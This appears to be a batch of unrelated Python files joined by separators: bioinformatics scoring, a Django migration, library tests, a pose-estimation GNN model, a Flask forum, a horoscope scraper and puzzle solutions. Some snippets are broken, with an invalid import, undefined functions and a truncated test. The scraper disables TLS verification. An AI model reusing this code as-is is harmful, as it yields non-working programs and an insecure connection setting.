if(hsp_tmp.score_tot < parametres["seuilScore"] or hsp_tmp.eval > parametres["seuilEvalue"]):
continue
# Ignorer les HSP si il existe déjà un HSP de score supérieur sur la même séquence.
if((hsp_tmp.hit.infoMotBDD[0] not in dicoHSP) or (hsp_tmp.hit.infoMotBDD[0] in dicoHSP and hsp_tmp.score_tot > dicoHSP[hsp_tmp.hit.infoMotBDD[0]].score_tot)):
hsp_tmp.pourcentageID_SIM(seqReq[1], bdd.dico_seqBDD[infoMotBDD[0]], blosum62)
dicoHSP[hsp_tmp.hit.infoMotBDD[0]] = hsp_tmp
# Classement des HSP par ordre croissant de score.
if(hsp_tmp.hit.infoMotBDD[0] in lScoreCroissant):
lScoreCroissant.remove(hsp_tmp.hit.infoMotBDD[0])
i = 0
for i, hsp in enumerate(lScoreCroissant):
if(dicoHSP[hsp].score_tot > hsp_tmp.score_tot):
break
lScoreCroissant.insert(i, hsp_tmp.hit.infoMotBDD[0])
# Ecriture sortie---------------------------------------------------
lScoreCroissant.reverse()
i = 0
with open(parametres["out"], "w") as fOut:
while i < min(parametres["nbHSP"], len(lScoreCroissant)):
fOut.write("### HSP "+str(i+1)+" ###\n")
fOut.write(dicoHSP[lScoreCroissant[i]].ecriture(seqReq, bdd.dico_seqBDD[dicoHSP[lScoreCroissant[i]].hit.infoMotBDD[0]]))
i += 1
print("Nombre de HSP: "+str(len(lScoreCroissant)))
print("\nDurée d'exécution : ")
print(strftime('%H:%M:%S', gmtime(time()-tps1)))
|
# Generated by Django 2.2.4 on 2019-09-17 22:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('residents', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='residentlotthroughmodel',
options={'ordering': ('order',), 'verbose_name': 'Resident', 'verbose_name_plural': 'Residents'},
),
migrations.AddField(
model_name='lot',
name='is_lock',
field=models.BooleanField(default=False, verbose_name='Lock Property'),
),
]
|
# Copyright 2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import pytest
from utils.generators import mk_0to1_array
import cunumeric as cn
from legate.core import LEGATE_MAX_DIM
def _outer(a_ndim, b_ndim, lib):
return lib.outer(
mk_0to1_array(lib, (a_ndim,)), mk_0to1_array(lib, (b_ndim,))
)
@pytest.mark.parametrize("a_ndim", range(1, LEGATE_MAX_DIM + 1))
@pytest.mark.parametrize("b_ndim", range(1, LEGATE_MAX_DIM + 1))
def test_basic(a_ndim, b_ndim):
assert np.array_equal(
_outer(a_ndim, b_ndim, np), _outer(a_ndim, b_ndim, cn)
)
def test_empty():
assert np.array_equal(_outer(0, 0, np), _outer(0, 0, cn))
if __name__ == "__main__":
import sys
sys.exit(pytest.main(sys.argv))
|
import sys
import os
import numpy as np
import math
class BP:
def __init__(self):
print("init bp")
if __name__ == '__main__':
bp = BP()
|
#! /usr/bin/python
import sys
def solve(word):
if len(word) == 1:
return word
return word_solve(sort_letter(word[0], word[1]), word[2:])
name = "A-large-practice"
path = ""
f = open(name + ".in", 'r')
o = open(name + ".out", 'w')
T = int(f.readline().strip())
sys.setrecursionlimit(1500)
print T
for t in xrange(T):
line = f.readline().strip()
res = solve(line)
s = "Case #%d: %s\n" % (t + 1, res)
#print s
o.write(s)
|
def write_tuples_to_file(filename, tuplelist):
with open(str(filename), 'w') as fp:
fp.write('\n'.join('%s %s' % x for x in tuplelist))
def in_degree(edges):
inDegreeDict = {}
for i, j in edges:
if j in inDegreeDict:
inDegreeDict[j] += 1
else:
inDegreeDict[j] = 1
return list(inDegreeDict.items())
def mergeSort(array):
# Base Case
if len(array) == 1:
return array
else:
# Initialize the iterators
i = 0
j = 0
# Split the array if half, so we can do merge sort
x = array[:len(array) // 2]
y = array[len(array) // 2:]
# activatte the recursive functions of both split arrays
x = mergeSort(x)
y = mergeSort(y)
final = []
# While loop is needed so the location of i and j do no collide.
while i < len(x) and j < len(y):
# Sorts of in ascending order
if x[i][1] < y[j][1]:
final.append(x[i])
i = i + 1
else:
final.append(y[j])
j = j + 1
final = final + x[i:]
final = final + y[j:]
return final
def recursion_reverse(sortedInDegree):
if len(sortedInDegree) == 0:
return [] # base case
else:
return [sortedInDegree.pop()] + recursion_reverse(sortedInDegree) # recusrive case
def looper(n, reversedTuple):
results = []
for i in range(0,n):
results.append(reversedTuple[i])
return results
def nth_highest_degree(n, edges):
# Obtains the in degree of all of the edges in the directed graph
unSortedInDegree = in_degree(edges)
# Use Merge-Sort Algorithim to sort all of the edges by ascending order
sortedInDegree = mergeSort(unSortedInDegree)
# Since pair of tuples of sorted, you can simply reverse the list of tuples
reversedTuple = list(reversed(sortedInDegree))
# reversedTuple = recursion_reverse(sortedInDegree)
# Return list of tuples, according till n-highest points
nth_highest = looper(n, reversedTuple)
return nth_highest
|
import qrcode
flag = 'DISCCTF{c0d1g0s_qr_g1f}'
count = 0
for x in flag:
img = qrcode.make(x)
img.save(str(count)+".jpg")
count = count + 1 |
from config import username, api_id, api_hash
from telethon import TelegramClient
def print_to_telegram(msg):
client = TelegramClient(username, api_id, api_hash)
async def main():
me = await client.get_me()
await client.send_message('me', msg)
with client:
client.loop.run_until_complete(main())
|
# ------------------------------------------------------------------------------
# CPM+GNN Pytorch Implementation
# CPN+GNN paper:
# https://arxiv.org/abs/1901.01760
# Written by Haiyang Liu (haiyangliu1997@gmail.com)
# ------------------------------------------------------------------------------
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.data as data
import torch.utils.model_zoo as model_zoo
from torch.autograd import Variable
from torch.nn import init
import torch_geometric.transforms as T
from torch_geometric.nn import GCNConv,GatedGraphConv
from torch_geometric.data import Data
edge_ = torch.tensor([[0,1],[1,0],[1,2],[2,1],[2,3],[3,2],
[3,4], [4,3],[2,4],[4,2],[1,5],[5,1],
[5,6],[6,5],[6,7],[7,6],[5,7],[7,5],
[1,8],[8,1],[8,9],[9,8],[9,10],[10,9],
[8,10],[10,8],[1,11],[11,1],[11,12],[12,11],
[12,13],[13,12],[11,13],[13,11],[0,14],[14,0],
[14,16],[16,14],[0,15],[15,0],[15,17],
[17,15]],dtype = torch.long)
edge_index = edge_.t().contiguous()
device = torch.device('cuda')
edge_index = edge_index.to(device)
# paf connection
edge_paf = torch.tensor([[0,2],[2,0],[1,3],[3,1],
[2,4],[4,2],[3,5],[5,3],
[6,8],[8,6],[7,9],[9,7],
[8,10],[10,8],[9,11],[11,9],
[0,12],[12,0],[1,13],[13,1],
[12,28],[28,12],[13,29],[29,13],
[20,6],[6,20],[21,7],[7,21],
[20,28],[28,20],[21,29],[29,21],
[32,28],[28,32],[29,33],[33,29],
[30,28],[28,30],[29,31],[31,29],
[34,30],[30,34],[31,35],[35,31],
[36,32],[32,36],[33,37],[37,33],
[36,26],[26,36],[37,27],[27,37],
[20,26],[26,20],[21,27],[27,21],
[14,16],[16,14],[15,17],[17,15],
[22,24],[24,22],[23,25],[25,23],
[18,12],[18,12],[19,13],[13,19],
[34,18],[18,34],[19,35],[35,19],
[20,22],[22,21],[21,23],[23,21],
[12,14],[14,12],[13,15],[15,13]
],dtype = torch.long)
edge_index_paf = edge_paf.t().contiguous()
#device = torch.device('cuda')
edge_index_paf = edge_index_paf.to(device)
'''
def data_transform(cnn_output_one_batch):
edge_index = torch.tensor([[0,1],[1,0],[1,2],[2,1],[2,3],[3,2],
[3,4], [4,3],[2,4],[4,2],[1,5],[5,1],
[5,6],[6,5],[6,7],[7,6],[5,7],[7,5],
[1,8],[8,1],[8,9],[9,8],[9,10],[10,9],
[8,10],[10,8],[1,11],[11,1],[11,12],[12,11],
[12,13],[13,12],[11,13],[13,11],[0,14],[14,0],
[14,16],[16,14],[0,15],[15,0],[15,17],
[17,15]],dtype = torch.long)
data = Data(x = cnn_output_one_batch, edge_index = edge_index.t().contiguous())
device = torch.device('cuda')
data = data.to(device)
return data'''
class Model_GNN(nn.Module):
''' A GGNN module, input 19 nodes,
CNN input size: N * 19 * H * W
'''
def __init__(self, Gnn_layers, use_gpu):
super().__init__()
self.gnn_layers = nn.ModuleList([GatedGraphConv(2116, 2) for l in range(Gnn_layers)])
#self.gnn_layers = nn.ModuleList([GCNConv(2116,2116) for l in range(Gnn_layers)])
#self.gnn_actfs = nn.ModuleList([nn.LeakyReLU() for l in range(Gnn_layers)])
self.use_gpu = use_gpu
def forward(self, cnn_output, gnn_interations):
N = cnn_output.size()[0]
C = cnn_output.size()[1]
H = cnn_output.size()[2]
W = cnn_output.size()[3]
gnn_output = cnn_output.view(N,C,H*W)
gnn_output_1 = gnn_output.clone()
#gnn_output_2 = gnn_output.clone()
#gnn_output_3 = gnn_output.clone()
#for i in range(gnn_interations): #propagate time
for n in range(N):# for n samples
#gnn_input_edge = data_transform(gnn_output[n]) # change to special data structure: data
for idx, g_layer in enumerate(self.gnn_layers):
#gnn_out_one_batch = self.gnn_actfs[idx](g_layer(gnn_output[n], edge_index))
gnn_out_one_batch = g_layer(gnn_output[n], edge_index)
gnn_output_1[n] = gnn_out_one_batch
'''
for n in range(N):# for n samples
#gnn_input_edge = data_transform(gnn_output[n]) # change to special data structure: data
for idx, g_layer in enumerate(self.gnn_layers):
gnn_out_one_batch = self.gnn_actfs[idx](g_layer(gnn_output_1[n], edge_index))
gnn_output_2[n] = gnn_out_one_batch '''
gnn_final = gnn_output_1.view(N,C,H,W)
return gnn_final
class Model_GNN_paf(nn.Module):
''' A GGNN module, input 19 nodes,
CNN input size: N * 38 * H * W
'''
def __init__(self, Gnn_layers, use_gpu):
super().__init__()
self.gnn_layers = nn.ModuleList([GatedGraphConv(2116, 2) for l in range(Gnn_layers)])
#self.gnn_layers = nn.ModuleList([GCNConv(2116,2116) for l in range(Gnn_layers)])
#self.gnn_actfs = nn.ModuleList([nn.LeakyReLU() for l in range(Gnn_layers)])
self.use_gpu = use_gpu
def forward(self, cnn_output, gnn_interations):
N = cnn_output.size()[0]
C = cnn_output.size()[1]
H = cnn_output.size()[2]
W = cnn_output.size()[3]
gnn_output = cnn_output.view(N,C,H*W)
gnn_output_1 = gnn_output.clone()
#gnn_output_2 = gnn_output.clone()
#gnn_output_3 = gnn_output.clone()
#for i in range(gnn_interations): #propagate time
for n in range(N):# for n samples
#gnn_input_edge = data_transform(gnn_output[n]) # change to special data structure: data
for idx, g_layer in enumerate(self.gnn_layers):
#gnn_out_one_batch = self.gnn_actfs[idx](g_layer(gnn_output[n], edge_index_paf))
gnn_out_one_batch = g_layer(gnn_output[n], edge_index_paf)
gnn_output_1[n] = gnn_out_one_batch
'''
for n in range(N):# for n samples
#gnn_input_edge = data_transform(gnn_output[n]) # change to special data structure: data
for idx, g_layer in enumerate(self.gnn_layers):
gnn_out_one_batch = self.gnn_actfs[idx](g_layer(gnn_output_1[n], edge_index))
gnn_output_2[n] = gnn_out_one_batch '''
gnn_final = gnn_output_1.view(N,C,H,W)
return gnn_final
# some founction to build cnn
def make_stages(cfg_dict):
"""Builds CPM stages from a dictionary
Args:
cfg_dict: a dictionary
"""
layers = []
for i in range(len(cfg_dict) - 1):
one_ = cfg_dict[i]
for k, v in one_.items():
if 'pool' in k:
layers += [nn.MaxPool2d(kernel_size=v[0], stride=v[1],
padding=v[2])]
else:
conv2d = nn.Conv2d(in_channels=v[0], out_channels=v[1],
kernel_size=v[2], stride=v[3],
padding=v[4])
layers += [conv2d, nn.ReLU(inplace=True)]
one_ = list(cfg_dict[-1].keys())
k = one_[0]
v = cfg_dict[-1][k]
conv2d = nn.Conv2d(in_channels=v[0], out_channels=v[1],
kernel_size=v[2], stride=v[3], padding=v[4])
layers += [conv2d]
return nn.Sequential(*layers)
def make_vgg19_block(block):
"""Builds a vgg19 block from a dictionary
Args:
block: a dictionary
"""
layers = []
for i in range(len(block)):
one_ = block[i]
for k, v in one_.items():
if 'pool' in k:
layers += [nn.MaxPool2d(kernel_size=v[0], stride=v[1],
padding=v[2])]
else:
conv2d = nn.Conv2d(in_channels=v[0], out_channels=v[1],
kernel_size=v[2], stride=v[3],
padding=v[4])
layers += [conv2d, nn.ReLU(inplace=True)]
return nn.Sequential(*layers)
def get_model(trunk='vgg19'):
blocks = {}
# block0 is the preprocessing stage
if trunk == 'vgg19':
block0 = [{'conv1_1': [3, 64, 3, 1, 1]},
{'conv1_2': [64, 64, 3, 1, 1]},
{'pool1_stage1': [2, 2, 0]},
{'conv2_1': [64, 128, 3, 1, 1]},
{'conv2_2': [128, 128, 3, 1, 1]},
{'pool2_stage1': [2, 2, 0]},
{'conv3_1': [128, 256, 3, 1, 1]},
{'conv3_2': [256, 256, 3, 1, 1]},
{'conv3_3': [256, 256, 3, 1, 1]},
{'conv3_4': [256, 256, 3, 1, 1]},
{'pool3_stage1': [2, 2, 0]},
{'conv4_1': [256, 512, 3, 1, 1]},
{'conv4_2': [512, 512, 3, 1, 1]},
{'conv4_3_CPM': [512, 256, 3, 1, 1]},
{'conv4_4_CPM': [256, 128, 3, 1, 1]}]
elif trunk == 'mobilenet':
block0 = [{'conv_bn': [3, 32, 2]}, # out: 3, 32, 184, 184
{'conv_dw1': [32, 64, 1]}, # out: 32, 64, 184, 184
{'conv_dw2': [64, 128, 2]}, # out: 64, 128, 92, 92
{'conv_dw3': [128, 128, 1]}, # out: 128, 256, 92, 92
{'conv_dw4': [128, 256, 2]}, # out: 256, 256, 46, 46
{'conv4_3_CPM': [256, 256, 1, 3, 1]},
{'conv4_4_CPM': [256, 128, 1, 3, 1]}]
# Stage 1
blocks['block1_1'] = [{'conv5_1_CPM_L1': [128, 128, 3, 1, 1]},
{'conv5_2_CPM_L1': [128, 128, 3, 1, 1]},
{'conv5_3_CPM_L1': [128, 128, 3, 1, 1]},
{'conv5_4_CPM_L1': [128, 512, 1, 1, 0]},
{'conv5_5_CPM_L1': [512, 38, 1, 1, 0]}]
blocks['block1_2'] = [{'conv5_1_CPM_L2': [128, 128, 3, 1, 1]},
{'conv5_2_CPM_L2': [128, 128, 3, 1, 1]},
{'conv5_3_CPM_L2': [128, 128, 3, 1, 1]},
{'conv5_4_CPM_L2': [128, 512, 1, 1, 0]},
{'conv5_5_CPM_L2': [512, 19, 1, 1, 0]}]
# Stages 2 - 6
for i in range(2, 7):
blocks['block%d_1' % i] = [
{'Mconv1_stage%d_L1' % i: [185, 128, 7, 1, 3]},
{'Mconv2_stage%d_L1' % i: [128, 128, 7, 1, 3]},
{'Mconv3_stage%d_L1' % i: [128, 128, 7, 1, 3]},
{'Mconv4_stage%d_L1' % i: [128, 128, 7, 1, 3]},
{'Mconv5_stage%d_L1' % i: [128, 128, 7, 1, 3]},
{'Mconv6_stage%d_L1' % i: [128, 128, 1, 1, 0]},
{'Mconv7_stage%d_L1' % i: [128, 38, 1, 1, 0]}
]
blocks['block%d_2' % i] = [
{'Mconv1_stage%d_L2' % i: [185, 128, 7, 1, 3]},
{'Mconv2_stage%d_L2' % i: [128, 128, 7, 1, 3]},
{'Mconv3_stage%d_L2' % i: [128, 128, 7, 1, 3]},
{'Mconv4_stage%d_L2' % i: [128, 128, 7, 1, 3]},
{'Mconv5_stage%d_L2' % i: [128, 128, 7, 1, 3]},
{'Mconv6_stage%d_L2' % i: [128, 128, 1, 1, 0]},
{'Mconv7_stage%d_L2' % i: [128, 19, 1, 1, 0]}
]
models_dict = {}
if trunk == 'vgg19':
print("Bulding VGG19")
models_dict['block0'] = make_vgg19_block(block0)
for k, v in blocks.items():
models_dict[k] = make_stages(list(v))
return models_dict
def use_vgg(model, model_path, trunk,weight_path):
try:
old_weights = torch.load(weight_path)
vgg_keys = old_weights.keys()
weights_load = {}
# weight+bias,weight+bias.....(repeat 10 times)
for i in range(len(vgg_keys)):
weights_load[list(model.state_dict().keys())[i]
] = old_weights[list(vgg_keys)[i]]
state = model.state_dict()
state.update(weights_load)
model.load_state_dict(state)
#model.load_state_dict(old_weights)
print('success load old weights and epoch num:')
except:
model_urls = {
'vgg16': 'https://download.pytorch.org/models/vgg16-397923af.pth',
'ssd': 'https://s3.amazonaws.com/amdegroot-models/vgg16_reducedfc.pth',
'vgg19': 'https://download.pytorch.org/models/vgg19-dcbb9e9d.pth'}
number_weight = {
'vgg16': 18,
'ssd': 18,
'vgg19': 20}
url = model_urls[trunk]
if trunk == 'ssd':
urllib.urlretrieve('https://s3.amazonaws.com/amdegroot-models/ssd300_mAP_77.43_v2.pth',
os.path.join(model_path, 'ssd.pth'))
vgg_state_dict = torch.load(os.path.join(model_path, 'ssd.pth'))
print('loading SSD')
else:
vgg_state_dict = model_zoo.load_url(url, model_dir=model_path)
vgg_keys = vgg_state_dict.keys()
# load weights of vgg
weights_load = {}
# weight+bias,weight+bias.....(repeat 10 times)
for i in range(number_weight[trunk]):
weights_load[list(model.state_dict().keys())[i]
] = vgg_state_dict[list(vgg_keys)[i]]
state = model.state_dict()
state.update(weights_load)
model.load_state_dict(state)
print('load imagenet pretrained model: {}'.format(model_path))
class Model_CNN(nn.Module):
def __init__(self, model_dict):
super(Model_CNN, self).__init__()
self.model0 = model_dict['block0']
self.model1_1 = model_dict['block1_1']
self.model2_1 = model_dict['block2_1']
self.model3_1 = model_dict['block3_1']
self.model4_1 = model_dict['block4_1']
self.model5_1 = model_dict['block5_1']
self.model6_1 = model_dict['block6_1']
self.model1_2 = model_dict['block1_2']
self.model2_2 = model_dict['block2_2']
self.model3_2 = model_dict['block3_2']
self.model4_2 = model_dict['block4_2']
self.model5_2 = model_dict['block5_2']
self.model6_2 = model_dict['block6_2']
self._initialize_weights_norm()
def forward(self, x):
saved_for_loss = []
out1 = self.model0(x)
out1_1 = self.model1_1(out1)
out1_2 = self.model1_2(out1)
out2 = torch.cat([out1_1, out1_2, out1], 1)
saved_for_loss.append(out1_1)
saved_for_loss.append(out1_2)
out2_1 = self.model2_1(out2)
out2_2 = self.model2_2(out2)
out3 = torch.cat([out2_1, out2_2, out1], 1)
saved_for_loss.append(out2_1)
saved_for_loss.append(out2_2)
out3_1 = self.model3_1(out3)
out3_2 = self.model3_2(out3)
out4 = torch.cat([out3_1, out3_2, out1], 1)
saved_for_loss.append(out3_1)
saved_for_loss.append(out3_2)
out4_1 = self.model4_1(out4)
out4_2 = self.model4_2(out4)
out5 = torch.cat([out4_1, out4_2, out1], 1)
saved_for_loss.append(out4_1)
saved_for_loss.append(out4_2)
out5_1 = self.model5_1(out5)
out5_2 = self.model5_2(out5)
out6 = torch.cat([out5_1, out5_2, out1], 1)
saved_for_loss.append(out5_1)
saved_for_loss.append(out5_2)
out6_1 = self.model6_1(out6)
out6_2 = self.model6_2(out6)
saved_for_loss.append(out6_1)
saved_for_loss.append(out6_2)
return (out6_1, out6_2), saved_for_loss
def _initialize_weights_norm(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
init.normal_(m.weight, std=0.01)
if m.bias is not None: # mobilenet conv2d doesn't add bias
init.constant_(m.bias, 0.0)
# last layer of these block don't have Relu
init.normal_(self.model1_1[8].weight, std=0.01)
init.normal_(self.model1_2[8].weight, std=0.01)
init.normal_(self.model2_1[12].weight, std=0.01)
init.normal_(self.model3_1[12].weight, std=0.01)
init.normal_(self.model4_1[12].weight, std=0.01)
init.normal_(self.model5_1[12].weight, std=0.01)
init.normal_(self.model6_1[12].weight, std=0.01)
init.normal_(self.model2_2[12].weight, std=0.01)
init.normal_(self.model3_2[12].weight, std=0.01)
init.normal_(self.model4_2[12].weight, std=0.01)
init.normal_(self.model5_2[12].weight, std=0.01)
init.normal_(self.model6_2[12].weight, std=0.01)
class Model_Total(nn.Module):
def __init__(self, model_dict, gnn_layers, use_gpu):
super().__init__()
self.cnn = Model_CNN(model_dict)
self.gnn = Model_GNN(gnn_layers,use_gpu)
self.gnn_paf = Model_GNN_paf(gnn_layers,use_gpu)
def forward(self, input, gnn_interations, use_gnn):
x_loss,saved_for_loss = self.cnn.forward(input)
x_heatmap = x_loss[1].clone()
x_paf = x_loss[0].clone()
if use_gnn:
y = self.gnn.forward(x_heatmap,gnn_interations)
out7_2 = x_loss[1] + y
z = self.gnn_paf.forward(x_paf,gnn_interations)
out7_1 = x_loss[0] + z
saved_for_loss.append(out7_1)
saved_for_loss.append(out7_2)
x_loss_gnn = (out7_1,out7_2)
return x_loss_gnn,saved_for_loss
else:
return x_loss,saved_for_loss
|
s = input("输入要转换的英文和字母")
s = s[:15]
print(s)
ls = list(s)
sum = 0
for i in range(len(ls)):
# print(ls[i])
sum += pow(256, 15 - i) * ord(ls[i])
# print(pow(256, 15 - i))
# print(sum)
print("转换后的数字为:", int(str(sum)[:21])) |
__author__ = 'iceke'
class Stage(object):
def __init__(self):
self.__stage_id = -1
self.__duration = ''
self.__tasks_percent = 0.0
self.__input_memory = ''
self.__shuffle_read = ''
self.__shuffle_write = ''
self.__submit_time = ''
self.__gc_time = 0.0
def object2dict(self, obj):
# convert object to a dict
d = {}
d['__class__'] = obj.__class__.__name__
d['__module__'] = obj.__module__
d.update(obj.__dict__)
return d
def get_gc_time(self):
return self.__gc_time
def set_gc_time(self, gc_time):
self.__gc_time = gc_time
def get_stage_id(self):
return self.__stage_id
def set_stage_id(self, stage_id):
self.__stage_id = stage_id
def get_duration(self):
return self.__duration
def set_duration(self, duration):
self.__duration = duration
def get_tasks_percent(self):
return self.__tasks_percent
def set_tasks_percent(self, tasks_percent):
self.__tasks_percent = tasks_percent
def get_input(self):
return self.__input_memory
def set_input(self, input_memory):
self.__input_memory = input_memory
def get_shuffle_read(self):
return self.__shuffle_read
def set_shuffle_read(self, shuffle_read):
self.__shuffle_read = shuffle_read
def get_shuffle_write(self):
return self.__shuffle_write
def set_shuffle_write(self, shuffle_write):
self.__shuffle_write = shuffle_write
def get_submit_time(self):
return self.__submit_time
def set_submit_time(self, submit_time):
self.__submit_time = submit_time
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import pytest
from pants.backend.codegen.soap.tailor import PutativeWsdlTargetsRequest
from pants.backend.codegen.soap.tailor import rules as tailor_rules
from pants.backend.codegen.soap.target_types import WsdlSourcesGeneratorTarget
from pants.core.goals.tailor import AllOwnedSources, PutativeTarget, PutativeTargets
from pants.engine.rules import QueryRule
from pants.testutil.rule_runner import RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
*tailor_rules(),
QueryRule(PutativeTargets, (PutativeWsdlTargetsRequest, AllOwnedSources)),
],
target_types=[],
)
def test_find_putative_targets(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/wsdl/simple.wsdl": "",
"src/wsdl/dir1/hello.wsdl": "",
"src/wsdl/dir1/world.wsdl": "",
}
)
pts = rule_runner.request(
PutativeTargets,
[
PutativeWsdlTargetsRequest(("src/wsdl", "src/wsdl/dir1")),
AllOwnedSources(["src/wsdl/simple.wsdl"]),
],
)
assert (
PutativeTargets(
[
PutativeTarget.for_target_type(
WsdlSourcesGeneratorTarget,
path="src/wsdl/dir1",
name=None,
triggering_sources=["hello.wsdl", "world.wsdl"],
),
]
)
== pts
)
|
def coerce_url(url):
url = url.strip()
if url.startswith("feed://"):
return "http://{0}".format(url[7:])
for proto in ["http://", "https://"]:
if url.startswith(proto):
return url
return "http://{0}".format(url)
|
import requests
from bs4 import BeautifulSoup
#@app.route('/star/<string:star>', methods=['GET'])
def constellation(star):
constellationDict = dict()
constellationDict = {'牡羊': 'Aries', '金牛': 'Taurus', '雙子': 'Gemini','巨蟹': 'Cancer',
'獅子': 'Leo', '處女': 'Virgo', '天秤': 'Libra','天蠍': 'Scorpio',
'射手': 'Sagittarius', '魔羯': 'Capricorn', '摩羯':'Capricorn','水瓶': 'Aquarius', '雙魚': 'Pisces'}
url = 'http://www.daily-zodiac.com/mobile/zodiac/{}'.format(constellationDict[star])
res = requests.get(url,verify=False)
res.encoding = 'utf-8'
soup = BeautifulSoup(res.text,'html.parser')
#print(soup)
name = soup.find_all('p')
#print(name)
starAndDate = []
for n in name:
#print n.text.encode('utf8')
starAndDate.append(n.text)
#print(starAndDate)
today = soup.select('.today')[0].text.strip('\n')
today = today.split('\n\n')[0]
#print today
title = soup.find('li').text.strip()
#print(title)
content = soup.find('article').text.strip()
#print content
resultString = ''
resultString += starAndDate[0] + ' ' + starAndDate[1] + '\n'
resultString += today + '\n'
resultString += content + '\n\n'
resultString += 'from 唐立淇每日星座運勢' + '\n\n'
resultString += '-以下是小歐星座網站-' + '\n'
urlOrz= 'https://horoscope.dice4rich.com/?sign={}'.format(constellationDict[star])
urlOrz = urlOrz.lower()
res = requests.get(urlOrz)
soup = BeautifulSoup(res.text,'html.parser')
title = soup.select('.current .title')
content = soup.select('.current .content')
for i in range(len(title)+len(content)):
if i%2 == 0:
print(title[int(i/2)].text.strip())
resultString += title[int(i/2)].text.strip() + '\n'
else:
print(content[int(i/2)].text)
resultString += content[int(i/2)].text + '\n\n'
return resultString
|
import Minefield from python-sweeper
import unittest
class TestMinefield:
""" Test the Minefield class
"""
def test_minefield_params(self):
""" Test that the minefield gets initialized with correct parameters
"""
tminefield = Minefield(10, 10)
print(Minefield.min
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Bucket ACL Resource."""
class BucketAccessControls(object):
"""Bucket ACL Resource.
"""
def __init__(self, bucket, entity, email, domain, role,
project_number=None):
"""Initialize
Args:
bucket (str): GCS bucket
entity (str): GCS entity
email (str): email
domain (str): domain
role (str): GCS role
project_number (int): the project number
"""
self.bucket = bucket
self.entity = entity
self.email = email
self.domain = domain
self.role = role
self.project_number = project_number
def __hash__(self):
"""Return hash of properties.
Returns:
hash: The hash of the class properties.
"""
return hash((self.bucket, self.entity, self.email, self.domain,
self.role, self.project_number))
|
class dataprocess:
#进行分页处理
def paging(self, data, num):
pass
#更具某些要求对数据进行排序
def ranking(self, data):
pass
|
from flask import Blueprint, g
from app import render_default_template, db
from .forum_models import ForumCategory, Forum, ForumThread, ForumReply
from .forum_forms import NewReplyForm
from flask_login import current_user
bp_forum = Blueprint("forum", __name__)
@bp_forum.route("/")
def forum_index():
cats = ForumCategory.query.all()
return render_default_template("plugins/forum/main.html", cats=cats)
@bp_forum.route("/forum_<int:fid>")
def forum_forum(fid: int):
forum = Forum.query.filter_by(fid=fid).first()
return render_default_template("plugins/forum/forum.html", forum=forum)
@bp_forum.route("/thread_<int:tid>", methods=["POST", "GET"])
def forum_thread(tid: int):
thread = ForumThread.query.filter_by(tid=tid).first()
form = NewReplyForm()
if form.validate_on_submit():
r = ForumReply(form.reply.data, current_user.uid, thread)
db.session.add(r)
db.session.commit()
return render_default_template("plugins/forum/thread.html", thread=thread, form=form)
|
# -*- coding: utf-8 -*-
from typing import List
class Solution:
def canPartition(self, nums: List[int]) -> bool:
sum_nums = sum(nums)
if sum_nums % 2 == 1:
return False
target_sum, possible_sums = sum_nums // 2, set([0])
for num in nums:
next_possible_sums = set()
for possible_sum in possible_sums:
if possible_sum + num == target_sum:
return True
next_possible_sums.add(possible_sum + num)
next_possible_sums.add(possible_sum)
possible_sums = next_possible_sums
return target_sum in possible_sums
if __name__ == "__main__":
solution = Solution()
assert solution.canPartition([1, 5, 11, 5])
assert not solution.canPartition([1, 2, 3, 5])
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.helm.target_types import (
HelmArtifactTarget,
HelmChartTarget,
HelmDeploymentFieldSet,
HelmDeploymentTarget,
)
from pants.backend.helm.target_types import rules as target_types_rules
from pants.backend.helm.testutil import (
HELM_TEMPLATE_HELPERS_FILE,
HELM_VALUES_FILE,
K8S_SERVICE_TEMPLATE,
gen_chart_file,
)
from pants.backend.helm.util_rules import chart
from pants.backend.helm.util_rules.chart import FindHelmDeploymentChart, HelmChart, HelmChartRequest
from pants.backend.helm.util_rules.chart_metadata import (
ChartType,
HelmChartDependency,
HelmChartMetadata,
ParseHelmChartMetadataDigest,
)
from pants.build_graph.address import Address
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.rules import QueryRule
from pants.testutil.rule_runner import RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
target_types=[HelmChartTarget, HelmArtifactTarget, HelmDeploymentTarget],
rules=[
*chart.rules(),
*target_types_rules(),
QueryRule(HelmChart, (HelmChartRequest,)),
QueryRule(HelmChartMetadata, (ParseHelmChartMetadataDigest,)),
QueryRule(HelmChart, (FindHelmDeploymentChart,)),
],
)
_TEST_CHART_COLLECT_SOURCES_PARAMS = [
("foo", "0.1.0", ChartType.APPLICATION, "https://www.example.com/icon.png"),
("bar", "0.2.0", ChartType.LIBRARY, None),
]
@pytest.mark.parametrize("name, version, type, icon", _TEST_CHART_COLLECT_SOURCES_PARAMS)
def test_collects_single_chart_sources(
rule_runner: RuleRunner,
name: str,
version: str,
type: ChartType,
icon: str | None,
) -> None:
rule_runner.write_files(
{
"BUILD": f"helm_chart(name='{name}')",
"Chart.yaml": gen_chart_file(name, version=version, type=type, icon=icon),
